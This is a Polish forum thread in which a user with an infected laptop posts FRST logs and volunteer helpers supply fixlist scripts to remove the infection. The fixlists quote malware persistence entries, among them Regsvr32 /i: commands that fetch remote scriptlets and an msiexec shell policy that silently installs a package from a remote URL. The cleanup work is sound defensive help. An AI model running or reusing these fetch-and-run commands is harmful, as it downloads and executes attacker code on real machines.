Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Zawirusowany laptop, logi FRST

madzgda20 08 Maj 2017 18:16 420 7
  • #1 08 Maj 2017 18:16
    madzgda20
    Poziom 3  

    Od pewnego czasu po podlaczeniu ladowarki do laptopa avast pokazywal komunikat o wykrytym zagrozeniu w folderze win32. Dzialo sie tak pare razy az pojawiala sie z nikad na pulpicie ikona mozilli firefox I wtedy antywirus szalal. Wykonalam skan Adwcleanerem, ktory usunal wirusy. Za pare dni znow to samo. Teraz mam wrazenie, ze wirusy zablokowaly mI dostep do internetu, poniewaz z obu zrodel pisze, ze jest brak internetu. Prosze o pomoc, co zrobic w tej sytuacji.

    EDIT
    Problem z internetem został rozwiązany, wynikał on najprawdopodobniej z niezaktualizowanego systemu.
    Przesyłam Logi z FRST

    0 7
  • #2 08 Maj 2017 18:40
    krzychupar
    Poziom 40  

    W pierwszej kolejności zamieść wymagane logi z programu FRST (Frst.txt i Addition.txt).

    0
  • #3 08 Maj 2017 18:43
    madzgda20
    Poziom 3  

    Zamieszczone

    0
  • Pomocny post
    #4 09 Maj 2017 06:31
    krzychupar
    Poziom 40  

    Otwórz notatnik systemowy i wklej:

    Task: {0161464B-E858-49BE-B551-D8FCCA38D6D8} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku <==== UWAGA
    Task: {218B3F94-792E-4B64-A4A4-3862ED755BAA} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA
    Task: {40269245-8879-4D3A-8D05-13B35AB0BA79} - \WPD\SqmUpload_S-1-5-21-632428468-1387991804-2553007176-1001 -> Brak pliku <==== UWAGA
    Task: {4111890E-94CF-4523-8154-B6598ED8CC9C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA
    Task: {452DA1CE-42B5-425A-880F-73052C012CFE} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8xRTU5OYUxNWwcM8UyMdhYNUQYMUU4RkQXRWk2M8RYMc== scrobj.dll
    Task: {47E83A6A-E647-43F7-B683-093D9C3EB209} - System32\Tasks\magdaBrainstormChallisV2 => Rundll32.exe MultilayerThermoelectron.dll,main 7 1 <==== UWAGA
    Task: {9D97A2BC-BCDE-4848-A721-A30AFCAB2DE7} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA
    Task: {E87B804B-DB8B-4AF1-8F3D-345114036BCB} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8xRTU5OYUxNWwcM8UyMdhYNUQYMUU4RkQXRWk2M8RYMc== scrobj.dll
    Task: {E96F1179-282E-4855-AD7D-F39A2A2519FB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA
    Task: {F076310D-ED1E-4E04-BFDE-8F5680ED2D88} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA
    HKU\S-1-5-21-632428468-1387991804-2553007176-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8xRTU5OYUxNWwcM8UyMdhYNUQYMUU4RkQXRWk2M8RYMc== /q
    HKU\S-1-5-21-632428468-1387991804-2553007176-1001\...\Policies\Explorer: []
    IFEO\taskmgr.exe: [Debugger]
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\msc\npMcSnFFPl.dll [Brak pliku]
    CHR HKLM-x32\...\Chrome\Extension: [daanglpcpkjjlkhcbladppjphglbigam] - hxxps://clients2.google.com/service/update2/crx




    CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
    S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
    2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 ____D C:\Users\Public\Documents\Google
    2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 ____D C:\Users\magda\AppData\Roaming\Mozilla
    2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 ____D C:\Users\magda\AppData\LocalLow\Mozilla
    2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 ____D C:\Users\magda\AppData\Local\Dayglad
    2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 ____D C:\Program Files (x86)\IIS
    2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 ____D C:\Program Files (x86)\Dayglad
    2017-05-03 14:15 - 2017-05-03 14:15 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
    2017-04-27 19:54 - 2017-05-08 18:20 - 00000000 ____D C:\WINDOWS\AppReadiness
    2017-04-27 19:54 - 2017-04-27 19:54 - 00000000 ____D C:\Users\magda\AppData\Local\VirtualStore
    2017-04-27 19:54 - 2017-04-27 19:54 - 00000000 ____D C:\Users\magda\AppData\Local\OEM
    2017-04-27 19:54 - 2017-04-27 19:54 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-04-27 19:50 - 2017-04-27 19:50 - 00000000 ____D C:\Users\magda\AppData\Local\DBG
    2017-04-27 19:45 - 2017-05-08 18:00 - 00000000 ____D C:\AdwCleaner
    2017-04-26 09:25 - 2017-04-27 12:33 - 00000000 _____ C:\WINDOWS\SysWOW64\44
    2017-04-26 09:21 - 2017-04-27 12:25 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze obok FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • Pomocny post
    #5 09 Maj 2017 08:10
    Kolobos
    Spec od komputerów

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    0
  • Pomocny post
    #7 09 Maj 2017 11:39
    Kolobos
    Spec od komputerów

    :arrow: madzgda20
    Wykonaj Fixlist.txt dla FRST:
    CloseProcesses:
    Shortcut: C:\Users\magda\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\FRST\Quarantine\C\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.)
    S2 IISvr; C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\te\msdeploy.resources.dll [X]
    C:\Users\magda\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
    2017-05-09 10:35 - 2017-05-09 10:35 - 00000000 ____D C:\Users\magda\AppData\Local\Dayglad
    2017-05-08 18:03 - 2017-05-09 10:27 - 00000044 _____ C:\Users\Public\Documents\temp.dat
    2017-05-08 17:55 - 2017-05-08 17:55 - 00000000 ____D C:\Users\Public\Documents\chrome
    2017-04-27 12:25 - 2017-04-27 12:25 - 00000000 ____D C:\WINDOWS\psgo
    2017-04-21 11:47 - 2016-12-05 20:16 - 00728064 _____ C:\WINDOWS\system32\multiplayer.dll
    2017-04-17 15:39 - 2017-04-17 15:39 - 00000000 ____D C:\Program Files (x86)\MIO

    Usun katalog C:\FRST.

    Zainstaluj Chrome ponownie z: https://www.google.pl/chrome/browser/desktop/

    To wszystko.

    :arrow: @krajech
    Nie podczepiaj sie pod inne watki! Zrobil sie przez Ciebie smietnik.

    Zamiesc nowe logi z FRST, ze skanowania.

    0
  • #8 09 Maj 2017 11:54
    madzgda20
    Poziom 3  

    Bardzo dziękuję za pomoc, wygląda na to, że wszystko jest już ok :)

    0